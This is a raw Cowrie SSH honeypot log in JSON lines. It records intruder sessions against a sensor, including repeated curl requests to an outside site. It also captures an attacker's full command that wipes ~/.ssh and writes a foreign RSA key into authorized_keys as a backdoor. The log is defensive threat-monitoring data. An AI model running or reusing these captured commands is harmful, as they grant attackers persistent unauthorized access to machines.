{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.535201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.575767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.577181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.614897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.615994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.653660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.655067Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.695231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.696366Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.739640Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.740709Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.742826Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.745688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.746419Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.788299Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.790021Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.829591Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.830721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.868983Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.870132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.913420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.914497Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.951213Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.952357Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:06.992354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.993380Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:06.997054Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.035926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.036898Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.075416Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.076389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.116014Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.116895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.156342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.157213Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.198018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.199048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.239908Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.240858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.282623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.283629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.321238Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.322574Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.361062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.361980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.399308Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.400251Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.442788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.443959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.480686Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.481638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.520201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.521098Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.565813Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.566733Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.569678Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.571376Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.613364Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.614385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.651717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.652675Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.749297Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.750290Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.790044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.790786Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.820849Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.821670Z","src_ip":"223.197.186.7","session":"b0dfc1ef4d4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.827611Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.828382Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.868239Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.869192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.909281Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.910152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.954178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.955152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:07.992593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:07.993512Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.031516Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.032517Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.073403Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.074381Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"223.197.186.7","src_port":56451,"dst_ip":"1.2.3.4","dst_port":22,"session":"6abacb09da6b","protocol":"ssh","message":"New connection: 223.197.186.7:56451 (1.2.3.4:22) [session: 6abacb09da6b]","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.084685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.085619Z","src_ip":"223.197.186.7","session":"6abacb09da6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.113430Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.114644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.151502Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.152354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.189350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.190233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.227106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.227980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.264681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.265628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.304589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.305511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.341967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.343003Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.345362Z","src_ip":"223.197.186.7","session":"6abacb09da6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.381144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.382343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.419930Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.420857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.461178Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.462227Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.506582Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.507926Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.544547Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.545504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:08.585577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:08.586496Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
